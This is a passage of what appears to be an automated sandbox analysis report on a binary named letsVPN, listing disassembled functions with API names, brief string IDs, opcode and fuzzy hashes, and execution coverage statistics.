                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __pctype_func_getptd$___lc_codepage_func___lc_locale_name_func_calloc_crt
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3272742379-0
                                                                                                                                                                                                    • Opcode ID: 84c5df84ef0c5cdd2e916334a6bf5530221d79a09e6cc33207ddf97f696cff82
                                                                                                                                                                                                    • Instruction ID: 041c17907dc4557987ee74c4032ed46d644b029682cb8f8ccb5bb24993d1226d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 84c5df84ef0c5cdd2e916334a6bf5530221d79a09e6cc33207ddf97f696cff82
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 70F0FF72601B4985FB96EFA1D0553DD7290EB4EF88F18C424BA480F3DADF78C6988391
                                                                                                                                                                                                    Function 0000000180011E28 Relevance: 7.5, APIs: 5, Instructions: 25COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$_inconsistency$DecodePointer_amsg_exit_getptd_noexit
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3669027769-0
                                                                                                                                                                                                    • Opcode ID: e0e06d72c905a5df2db11f44fd49f3875c1da61348c6b35bcc64d3be87afdf69
                                                                                                                                                                                                    • Instruction ID: 8eacf6c3a0e0d25c8626d20b650a7e713e01794de6f99655e7c2036657d12a82
                                                                                                                                                                                                    • Opcode Fuzzy Hash: e0e06d72c905a5df2db11f44fd49f3875c1da61348c6b35bcc64d3be87afdf69
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0CF01C32605D8884FFE76BD5E1423FC62E1A75CBC8F0CC521FA540728BDE24CA988755
                                                                                                                                                                                                    Function 0000000180007B30 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 152COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: std::exception::exception.LIBCMT ref: 000000018000791C
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: _CxxThrowException.LIBCMT ref: 0000000180007939
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: fgets.LIBCMT ref: 000000018000794C
                                                                                                                                                                                                      • Part of subcall function 0000000180007878: _pclose.LIBCMT ref: 0000000180007980
                                                                                                                                                                                                      • Part of subcall function 0000000180001C6C: std::ios_base::getloc.LIBCPMT ref: 0000000180001C98
                                                                                                                                                                                                    • std::ios_base::_Ios_base_dtor.LIBCPMT ref: 0000000180007DB0
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ExceptionIos_base_dtorThrow_pclosefgetsstd::exception::exceptionstd::ios_base::_std::ios_base::getloc
                                                                                                                                                                                                    • String ID: /al$ipco$nfig
                                                                                                                                                                                                    • API String ID: 3465259001-4231646982
                                                                                                                                                                                                    • Opcode ID: 6a92920c7bc4735bc74e8adb372b0bc37048f94f376ff593bf359793745f81a4
                                                                                                                                                                                                    • Instruction ID: 9c91fa3ca3c0817a55952564f80012bba0731b32b0c8655ea8f0e7c389f5f77d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6a92920c7bc4735bc74e8adb372b0bc37048f94f376ff593bf359793745f81a4
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7715E32610AC89AEBA1DF34D8407D93761FB597A8F508215FA6D1BAEADF34C349C341
                                                                                                                                                                                                    Function 00000001800169AC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 144COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentImageNonwritableUnwind
                                                                                                                                                                                                    • String ID: $csm
                                                                                                                                                                                                    • API String ID: 451473138-717980254
                                                                                                                                                                                                    • Opcode ID: 7a01ea639593dd387646a3f7e4420759ba4e612b485dd865fb1099628eb4b212
                                                                                                                                                                                                    • Instruction ID: 3be022b5461d152aabb891bdf172afd75cde4f8b08656ce6a24ee9f740c0854a
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7a01ea639593dd387646a3f7e4420759ba4e612b485dd865fb1099628eb4b212
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C751F332B02A488BEB97DF15E844B9837A1F748BC8F54C120EE0693798DF70DA89C700
                                                                                                                                                                                                    Function 0000000180018208 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 51COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_lseeki64_write
                                                                                                                                                                                                    • String ID: $p^f
                                                                                                                                                                                                    • API String ID: 2577073331-4239080599
                                                                                                                                                                                                    • Opcode ID: 75876cad2acb07627db3e6d8a17810d58ab564f56b183f15df871a460318ffe0
                                                                                                                                                                                                    • Instruction ID: bbc1748b0e4912f4bbdfd24d31f7153fcdc314768b3959c9ff65e79e13f88314
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 75876cad2acb07627db3e6d8a17810d58ab564f56b183f15df871a460318ffe0
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF11B172308F488ADB978F29D4403AC7761FB4DBE4F589206EA69433D9DE38CB599700
                                                                                                                                                                                                    Function 00000001800247D2 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42fileCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _get_osfhandle$Handle_lseeki64_nolock$CloseErrorLast_close_nolock_dosmaperr_errno_free_osfhnd$File__create_set_osfhnd_write
                                                                                                                                                                                                    • String ID: p^f
                                                                                                                                                                                                    • API String ID: 1668876506-727254517
                                                                                                                                                                                                    • Opcode ID: 7984b302538a04fd216cb1f2368621802762a69f29c59e5d9e6f6f23897acf41
                                                                                                                                                                                                    • Instruction ID: 6de801c424137567e14173643d6088ce47ca20df87565dbbae9f74d616ad6755
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7984b302538a04fd216cb1f2368621802762a69f29c59e5d9e6f6f23897acf41
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8011CE33720E8885EB97D768D4913AC2770A749BF8F559708EA7A4B3E5CE688508C312
                                                                                                                                                                                                    Function 000000018000EC57 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: EncodePointer
                                                                                                                                                                                                    • String ID: d
                                                                                                                                                                                                    • API String ID: 2118026453-820377970
                                                                                                                                                                                                    • Opcode ID: 3e4e0e1684a06939669e23bbbe86343f175827bd11629dab7abfc3f54090efdb
                                                                                                                                                                                                    • Instruction ID: f37ca4257af8c23d23d2bb1b397a0576a2bc145b126aa7e1e25d2f85e5fdda94
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3e4e0e1684a06939669e23bbbe86343f175827bd11629dab7abfc3f54090efdb
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C7012831205A48C2FA93DB51E4457D8B3A1B74EBD0F448525EA4E16395EF39C68D8300
                                                                                                                                                                                                    Function 00000001800244FF Relevance: 6.1, APIs: 4, Instructions: 120COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _errno_invalid_parameter_noinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2959964966-0
                                                                                                                                                                                                    • Opcode ID: d3af5bbe54961b1d7dcc5b363a3e559933824cf9791eeeca8759782873a9d65a
                                                                                                                                                                                                    • Instruction ID: 9ebde2755e581dadbce0d7f7b890ea15efc5b0c31b30096d9125daad0d26f9ae
                                                                                                                                                                                                    • Opcode Fuzzy Hash: d3af5bbe54961b1d7dcc5b363a3e559933824cf9791eeeca8759782873a9d65a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0241D573A009688BF7F78E6C90453EC27A1A74D398F54C41AF6929FAC7CD388A4D8741
                                                                                                                                                                                                    Function 000000018001D3C0 Relevance: 6.1, APIs: 4, Instructions: 106COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$StringTypefree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3522554955-0
                                                                                                                                                                                                    • Opcode ID: accd0cf4b4f14c420e85aae7a96ea48fd0b0a3355ec4bdfb55f1f59843f4ccff
                                                                                                                                                                                                    • Instruction ID: 2540e719a89882b95ad61e0eb3008961b3879a771be8f5be22c7ca85185634ff
                                                                                                                                                                                                    • Opcode Fuzzy Hash: accd0cf4b4f14c420e85aae7a96ea48fd0b0a3355ec4bdfb55f1f59843f4ccff
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E8418332200F8887EBA69F2598403D96395F74DBE8F588616FE2E477D5DF38D6098300
                                                                                                                                                                                                    Function 0000000180007878 Relevance: 6.1, APIs: 4, Instructions: 67COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Exception$Copy_strFileHeaderRaiseThrow_pclosefgetsstd::exception::_std::exception::exception
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1743889360-0
                                                                                                                                                                                                    • Opcode ID: 4e54a260fa7be0e3ff7fb024a1e4e820d67683f74a8e9cdd18430075a31ae9e2
                                                                                                                                                                                                    • Instruction ID: 100ce4ba59c252cdb160de8ee261dbdff430980fbbf453e23859cd0748682005
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 4e54a260fa7be0e3ff7fb024a1e4e820d67683f74a8e9cdd18430075a31ae9e2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F6317431608B8981EBA2DB14E4413EA7790F78C7D4F545225B69D06BAADF7CC349CB40
                                                                                                                                                                                                    Function 0000000180027A0C Relevance: 6.1, APIs: 4, Instructions: 62stringCOMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_getptd_noexit_invalid_parameter_noinfostrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2615622293-0
                                                                                                                                                                                                    • Opcode ID: 118e86b0fdc198884dd44a1f401273e20d05bbc0534e4c28fb2d1664b76791dc
                                                                                                                                                                                                    • Instruction ID: 9effb36682a3647b8937f0e7358b2fc8195419eedb52e07462cad8161f0c1b4f
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 118e86b0fdc198884dd44a1f401273e20d05bbc0534e4c28fb2d1664b76791dc
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8621C3723146A881EBE3461590503BDA7E2E3C8BF4F58C125FA9A0AAC6DD2CC749C712
                                                                                                                                                                                                    Function 0000000180018D28 Relevance: 6.1, APIs: 4, Instructions: 60stringCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Locale$UpdateUpdate::__errno_getptd_getptd_noexit_invalid_parameter_noinfostrrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3089783468-0
                                                                                                                                                                                                    • Opcode ID: 741d4caf8ccba4ef54e0bb375cf78c2812c91bd2b046ec827cdfda8b4fd8261e
                                                                                                                                                                                                    • Instruction ID: c157a4136c12881e15d1d6466a1d1e032bd19282ed3789510d37b6ed984cd8dd
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 741d4caf8ccba4ef54e0bb375cf78c2812c91bd2b046ec827cdfda8b4fd8261e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0211E732204B8C41FBE78615B4443FD67A1AB9A7D4F18C129FA96077C9CE68C74DD741
                                                                                                                                                                                                    Function 00000001800039A3 Relevance: 6.1, APIs: 2, Strings: 2, Instructions: 54COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: rand$_getptd
                                                                                                                                                                                                    • String ID: VUUU$gfff
                                                                                                                                                                                                    • API String ID: 2986147986-2662692612
                                                                                                                                                                                                    • Opcode ID: 79e7527c8d548161c2635a0219954f5cc905e83357b026be1423fa4b1b072368
                                                                                                                                                                                                    • Instruction ID: f4cbb9994f2192c02038a558b7f24809a3cbc7a7a85d0f49fb9528de59c6dda1
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 79e7527c8d548161c2635a0219954f5cc905e83357b026be1423fa4b1b072368
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A1129323249D885EB9FCA2F90023DC7659E38DBC0F448025AA46877C5DE29C6998342
                                                                                                                                                                                                    Function 0000000180012D96 Relevance: 6.0, APIs: 4, Instructions: 30threadCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CurrentThread__addlocaleref_calloc_crt_initptdfree
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 144977139-0
                                                                                                                                                                                                    • Opcode ID: 99bbc45fb0d88c85ed0a7837acf2da6e48772332560751cef88ded992aa98626
                                                                                                                                                                                                    • Instruction ID: dd0f1f0c231c5fc80c7439be1b3e8a88326aa7477beda5119a12924904dd7238
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 99bbc45fb0d88c85ed0a7837acf2da6e48772332560751cef88ded992aa98626
                                                                                                                                                                                                    • Instruction Fuzzy Hash: D7F0BB30205E48C6FBDBAB21C8143E951819B4C7E1F44C624B5294A3D2FE688B5D8360
                                                                                                                                                                                                    Function 000000018001B814 Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _amsg_exit_getptd$Ex_nolock_getptd_noexit_updatetlocinfo
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 3801014656-0
                                                                                                                                                                                                    • Opcode ID: bb891b1bf428b43ed66d4fcbf3128df9e4b38bedd9c27796735ddc3a2761477b
                                                                                                                                                                                                    • Instruction ID: d4aacb6000a69ceffea1ebe97908f6bebd0b7ae2b0ac0e702d7cc498c4538d71
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bb891b1bf428b43ed66d4fcbf3128df9e4b38bedd9c27796735ddc3a2761477b
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 14F0303161190882FBDAAB5588427E82269EB4CBC4F0C8235FA18473D2DF148748C711
                                                                                                                                                                                                    Function 0000000180028C94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 35COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 00000000.00000002.2231440142.0000000180001000.00000040.00001000.00020000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231415181.0000000180000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180223000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    • Associated: 00000000.00000002.2231440142.0000000180226000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_0_2_180000000_letsVPN.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _getptd$_inconsistency
                                                                                                                                                                                                    • String ID: csm
                                                                                                                                                                                                    • API String ID: 1773999731-1018135373
                                                                                                                                                                                                    • Opcode ID: a9840fc552d5e32cb518b91f9157295173cd6d80fbcfbbbd7aaf308e4ccaaf6a
                                                                                                                                                                                                    • Instruction ID: c175b3ae7acb65c193fc889e73e4d0c379e904474d6a669c45e4c9de5337dc13
                                                                                                                                                                                                    • Opcode Fuzzy Hash: a9840fc552d5e32cb518b91f9157295173cd6d80fbcfbbbd7aaf308e4ccaaf6a
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C301863650268989EBA2AF31C8817EC23A4FB4DBDDF189131FE094A745CF30CA88D340

                                                                                                                                                                                                    Execution Graph

                                                                                                                                                                                                    Execution Coverage:0%
                                                                                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                                    Signature Coverage:53.5%
                                                                                                                                                                                                    Total number of Nodes:71
                                                                                                                                                                                                    Total number of Limit Nodes:1
